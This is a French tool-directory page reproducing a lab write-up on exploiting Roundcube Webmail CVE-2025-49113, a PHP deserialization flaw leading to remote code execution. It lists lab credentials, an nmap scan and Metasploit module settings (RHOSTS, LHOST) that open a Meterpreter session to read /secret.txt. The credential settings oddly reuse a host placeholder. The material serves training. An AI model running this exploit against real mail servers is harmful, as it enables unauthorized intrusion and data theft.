Skip to content
KitploitKITPLOIT
OutilsExploitsBlog
Log in
Soumettre
OutilsExploitsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

FluxContactConfidentialité© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
roundcube-cve-2025-49113-lab — Laboratoire d'exploitation pratique pour Roundcube Webmail CVE-2025-49113 (désérialisation authentifiée d'objets PHP → RCE) pour lire /secret.txt. | Kitploit
Outils/GitHubGitHub/ankitpandey383/roundcube-cve-2025-49113-lab
Analyse des VulnérabilitésAnalyse de CodeExploitationExploitation d'Applications WebCTFTests d'IntrusionApprentissage et ÉducationRed TeamingDéveloppement de Charges Utiles
Labs et Pratique
GitHubankitpandey383/roundcube-cve-2025-49113-lab

roundcube-cve-2025-49113-lab

Laboratoire d'exploitation pratique pour Roundcube Webmail CVE-2025-49113 (désérialisation authentifiée d'objets PHP → RCE) pour lire /secret.txt.

Voir le dépôt
15il y a 10 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

"AVERTISSEMENT : Usage éducatif uniquement"

Laboratoire Roundcube Webmail RCE – CVE-2025-49113

Ce dépôt documente mon exploitation pas à pas de Roundcube Webmail CVE-2025-49113 dans un laboratoire contrôlé afin d'obtenir le secret stocké dans /secret.txt.

⚠️ Avertissement
Tout le travail a été effectué sur un environnement de laboratoire / formation que je suis autorisé à tester.
N'utilisez pas ces techniques contre des systèmes que vous ne possédez pas ou que vous n'administrez pas.


Défi

Roundcube Webmail est un client de messagerie PHP open source basé sur le navigateur qui se connecte aux boîtes aux lettres via IMAP et envoie des courriels via SMTP. Il fonctionne généralement sur Apache ou Nginx avec MySQL/PostgreSQL/SQLite et est largement utilisé dans les environnements d'hébergement mutualisé.

Vulnérabilité – CVE-2025-49113

Toutes les versions de Roundcube jusqu'à 1.6.10 incluse (et 1.5.x avant 1.5.10) contiennent un bug critique dans program/actions/settings/upload.php. Le paramètre _from n'est pas correctement validé, ce qui permet à un attaquant authentifié de déclencher une désérialisation non sécurisée d'objets PHP et d'obtenir une exécution de code à distance avec les privilèges du serveur web.

Identifiants du laboratoire :

  • Nom d'utilisateur : roundcube
  • Mot de passe : rcpass

Objectif :

Quel est le secret contenu dans le fichier /secret.txt ?


Environnement du laboratoire

  • Hôte attaquant : Kali / HackerBox avec :
    • nmap
    • msfconsole (Metasploit 6)
  • Hôte cible : Roundcube Webmail sur 172.20.2.57
  • Exploit utilisé : exploit/multi/http/roundcube_auth_rce_cve_2025_49113

Procédure pas à pas

Étape 1 – Découverte de services avec Nmap

Commande : nmap -sV Target Machine

Étape 2 – Localisation d'un exploit de désérialisation d'objets PHP dans Metasploit

search php object deserialization

Étape 3 – Configuration du module d'exploit Roundcube

msf6 > use exploit/multi/http/roundcube_auth_rce_cve_2025_49113 msf6 exploit(multi/http/roundcube_auth_rce_cve_2025_49113) > set RHOSTS Target Machine msf6 exploit(multi/http/roundcube_auth_rce_cve_2025_49113) > set LHOST Kali Machine msf6 exploit(multi/http/roundcube_auth_rce_cve_2025_49113) > set USERNAME Target Machine msf6 exploit(multi/http/roundcube_auth_rce_cve_2025_49113) > set PASSWORD Target Machine

Étape 4 – Obtention d'une session Meterpreter et lecture de /secret.txt

meterpreter > cat /secret.txt

Télécharger l’outil